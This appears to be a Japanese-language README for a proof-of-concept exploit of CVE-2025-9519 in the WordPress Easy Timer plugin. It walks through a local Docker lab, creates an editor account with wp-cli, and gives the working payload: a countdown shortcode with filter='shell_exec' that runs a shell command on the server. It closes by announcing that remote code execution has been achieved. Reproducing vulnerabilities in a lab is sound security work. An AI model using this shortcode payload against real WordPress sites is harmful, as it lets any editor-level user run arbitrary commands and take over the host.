
CVE-2025-9519の概念実証エクスプロイト。WordPress Easy Timerプラグインにおける、細工されたショートコードフィルターを介したリモートコード実行を実証し、Dockerベースのセットアップを備えています。
公式の Docker ドキュメントを参照してインストールしてください: Docker Engine インストール
プロジェクトディレクトリから:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/ にアクセスしますWordPress ダッシュボード → プラグイン → Easy Timer に移動し、 をクリックします。
有効化
プロジェクトディレクトリから次のコマンドを実行します:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(注: ユーザー名、メールアドレス、パスワードは任意のものに置き換えてください!)
投稿 → 新規追加 に移動しますショートコードブロック を挿入し、次のように入力します:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ 注: ショートコードが正しく表示されるように、段落ブロックではなく ショートコードブロック を使用していることを確認してください。

おめでとうございます。RCE を取得しました。

sudo docker ps
次のような表示が確認できるはずです:

ショートコードが 表示されない 場合:
http://localhost:8000/ にアクセスして データベースに接続されていません と表示される場合: